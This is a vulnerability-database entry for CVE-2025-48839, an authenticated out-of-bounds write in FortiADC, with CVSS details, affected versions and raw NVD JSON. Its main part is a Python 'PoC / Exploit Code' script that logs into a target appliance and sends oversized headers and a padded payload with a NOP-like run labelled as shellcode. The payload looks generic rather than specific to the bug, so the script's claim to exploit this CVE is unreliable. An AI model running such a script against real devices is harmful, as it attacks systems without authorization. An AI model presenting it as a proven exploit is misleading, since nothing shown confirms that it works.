Security Vulnerability Report
中文
CVE-2025-48839 CVSS 6.6 MEDIUM

CVE-2025-48839

Published: 2025-11-18 17:16:03
Last Modified: 2025-11-20 14:37:57
Source: [email protected]

Description

An Out-of-bounds Write vulnerability [CWE-787] in FortiADC 8.0.0, 7.6.0 through 7.6.2, 7.4.0 through 7.4.7, 7.2 all versions, 7.1 all versions, 7.0 all versions, 6.2 all versions may allow an authenticated attacker to execute arbitrary code via specially crafted HTTP requests.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortiadc:8.0.0:*:*:*:*:*:*:* - VULNERABLE
FortiADC 8.0.0
FortiADC 7.6.0 - 7.6.2
FortiADC 7.4.0 - 7.4.7
FortiADC 7.2 (所有版本)
FortiADC 7.1 (所有版本)
FortiADC 7.0 (所有版本)
FortiADC 6.2 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-48839 PoC - FortiADC Out-of-bounds Write # This PoC demonstrates the vulnerability in FortiADC HTTP request parsing # Requires valid authentication credentials with high privileges import requests import sys TARGET_URL = "https://target-fortiadc.example.com/api/v2/cmdb/system/vdom" # Authentication credentials (requires high privilege account) AUTH = { "username": "admin", "password": "password" } def login(): """Authenticate to FortiADC and obtain session cookie""" session = requests.Session() login_url = f"{TARGET_URL.split('/api')[0]}/api/v2/login" try: response = session.post(login_url, json=AUTH, verify=False, timeout=10) if response.status_code == 200: return session else: print(f"[-] Authentication failed: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return None def exploit_oob_write(session): """Send crafted HTTP request to trigger OOB write vulnerability""" # Craft malicious payload with oversized parameters # This triggers boundary check bypass in HTTP parser malicious_headers = { "Content-Type": "application/json", "X-Custom-Header": "A" * 10000 # Oversized header value } # Malicious payload designed to cause OOB write exploit_data = { "name": "vdom_test", "description": "A" * 8000 + "\x41\x42\x43\x44", # Trigger overflow "custom_param": { "nested": "X" * 5000 + "\x90" * 100 # Shellcode pattern } } try: print("[*] Sending exploit payload...") response = session.put(TARGET_URL, json=exploit_data, headers=malicious_headers, verify=False, timeout=30) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response: {response.text[:500]}") if response.status_code in [200, 201]: print("[+] Exploit sent successfully - check for code execution") else: print("[-] Exploit may have failed or been blocked") except Exception as e: print(f"[-] Exploit error: {e}") def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-48839_poc.py <target_ip>") print("Example: python cve-2025-48839_poc.py 192.168.1.100") sys.exit(1) global TARGET_URL TARGET_URL = f"https://{sys.argv[1]}:443/api/v2/cmdb/system/vdom" print("[*] CVE-2025-48839 FortiADC OOB Write Exploit") print("[*] Target:", TARGET_URL) session = login() if session: exploit_oob_write(session) session.delete(f"{TARGET_URL.split('/api')[0]}/api/v2/logout") else: print("[-] Failed to obtain valid session") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48839", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:02.610", "lastModified": "2025-11-20T14:37:57.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Out-of-bounds Write vulnerability [CWE-787] in FortiADC 8.0.0, 7.6.0 through 7.6.2, 7.4.0 through 7.4.7, 7.2 all versions, 7.1 all versions, 7.0 all versions, 6.2 all versions may allow an authenticated attacker to execute arbitrary code via specially crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "7.4.8", "matchCriteriaId": "E77DAF02-DADB-4F22-817B-39059388C7FC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.3", "matchCriteriaId": "B70F7B79-80C8-4DD1-A310-86E4EEC373EC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "FE5091E7-982E-451B-B782-4C9669421558"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-225", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.